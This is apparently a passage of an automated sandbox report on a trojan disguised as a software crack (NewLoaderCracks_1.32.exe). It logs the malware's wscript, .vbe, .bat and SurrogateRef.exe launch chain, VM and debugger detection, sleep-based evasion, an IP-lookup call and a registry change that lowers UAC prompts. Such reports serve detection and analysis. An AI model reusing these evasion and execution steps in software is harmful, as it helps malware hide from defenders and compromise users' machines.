            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: SurrogateRef.exe, 00000005.00000002.2465802434.0000000002391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: C:\comcontainer\SurrogateRef.exeMemory allocated: 8B0000 memory reserve | memory write watchJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeMemory allocated: 1A390000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeMemory allocated: 2E60000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeMemory allocated: 1B080000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeMemory allocated: 3020000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeMemory allocated: 1B080000 memory reserve | memory write watchJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 599670Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 599559Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 599420Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 598968Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 598615Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 598394Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 598265Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 598137Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 598030Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 597921Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 597811Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 597685Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 597406Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 597281Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 597168Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 597051Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 596922Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 596812Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 596093Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 595968Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 595839Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 595714Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 595580Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 595435Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 595311Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 595179Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 595054Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 594907Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 594782Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 594668Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 594508Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 594395Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 594266Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 594146Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 594013Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 593889Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 593761Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 593401Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 593271Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 593111Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 592981Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 592861Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 592731Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 592609Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 592500Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 592397Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 592268Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 592144Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 592014Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 591912Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 591788Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 591641Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 591526Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 591389Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 591267Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 591146Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 591005Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 590864Jump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeWindow / User API: threadDelayed 4857Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeWindow / User API: threadDelayed 4177Jump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeWindow / User API: threadDelayed 374Jump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeWindow / User API: threadDelayed 367Jump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-22977
            Source: C:\comcontainer\SurrogateRef.exe TID: 368Thread sleep count: 4857 > 30Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 368Thread sleep count: 4177 > 30Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -24903104499507879s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 2912Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -599670s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -599559s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -599420s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -598968s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -598615s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -598394s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -598265s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -598137s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -598030s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -597921s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -597811s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -597685s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -597406s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -597281s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -597168s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -597051s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -596922s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -596812s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -596093s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -595968s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -595839s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -595714s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -595580s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -595435s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -595311s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -595179s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -595054s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -594907s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -594782s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -594668s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -594508s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -594395s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -594266s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -594146s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -594013s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -593889s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -593761s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -593401s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -593271s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -593111s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -592981s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -592861s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -592731s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -592609s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -592500s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -592397s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -592268s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -592144s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -592014s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -591912s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -591788s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -591641s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -591526s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -591389s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -591267s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -591146s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -591005s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exe TID: 5140Thread sleep time: -590864s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exe TID: 6520Thread sleep count: 374 > 30Jump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exe TID: 6764Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exe TID: 6844Thread sleep count: 367 > 30Jump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exe TID: 3384Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\comcontainer\SurrogateRef.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0054A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0054A5F4
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0055B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0055B8E0
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0056AAA8 FindFirstFileExA,0_2_0056AAA8
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0055DD72 VirtualQuery,GetSystemInfo,0_2_0055DD72
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 60000Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 599670Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 599559Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 599420Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 598968Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 598615Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 598394Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 598265Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 598137Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 598030Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 597921Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 597811Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 597685Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 597406Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 597281Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 597168Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 597051Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 596922Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 596812Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 596093Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 595968Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 595839Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 595714Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 595580Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 595435Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 595311Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 595179Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 595054Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 594907Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 594782Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 594668Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 594508Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 594395Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 594266Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 594146Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 594013Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 593889Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 593761Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 593401Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 593271Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 593111Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 592981Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 592861Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 592731Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 592609Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 592500Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 592397Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 592268Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 592144Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 592014Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 591912Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 591788Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 591641Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 591526Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 591389Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 591267Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 591146Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 591005Jump to behavior
            Source: C:\comcontainer\SurrogateRef.exeThread delayed: delay time: 590864Jump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: SurrogateRef.exe, 00000005.00000002.2465802434.0000000002391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hyper-v video
            Source: SurrogateRef.exe, 00000005.00000002.2465802434.0000000002391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: wscript.exe, 00000002.00000002.2258849907.000000000093F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}j{
            Source: SurrogateRef.exe, 00000005.00000002.2483734240.000000001C252000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: SurrogateRef.exe, 00000005.00000002.2483734240.000000001C252000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}^
            Source: NewLoaderCracks_1.32.exe, 00000000.00000003.2151665836.0000000002EA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Z|
            Source: SurrogateRef.exe, 00000005.00000002.2480152172.000000001B2D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeAPI call chain: ExitProcess graph end nodegraph_0-23320
            Source: C:\comcontainer\SurrogateRef.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0056866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0056866F
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0056753D mov eax, dword ptr fs:[00000030h]0_2_0056753D
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0056B710 GetProcessHeap,0_2_0056B710
            Source: C:\comcontainer\SurrogateRef.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0055F063 SetUnhandledExceptionFilter,0_2_0055F063
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0055F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0055F22B
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0056866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0056866F
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0055EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0055EF05
            Source: C:\comcontainer\SurrogateRef.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\comcontainer\Kr8tZ.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\comcontainer\xNFGfK2ypxJsgsGsm5kX9.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\comcontainer\SurrogateRef.exe "C:\comcontainer\SurrogateRef.exe" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0055ED5B cpuid 0_2_0055ED5B
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0055A63C
            Source: C:\comcontainer\SurrogateRef.exeQueries volume information: C:\comcontainer\SurrogateRef.exe VolumeInformationJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeQueries volume information: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeQueries volume information: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0055D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0055D5D4
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeCode function: 0_2_0054ACF5 GetVersionExW,0_2_0054ACF5
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\comcontainer\SurrogateRef.exeRegistry value created: PromptOnSecureDesktop 0Jump to behavior
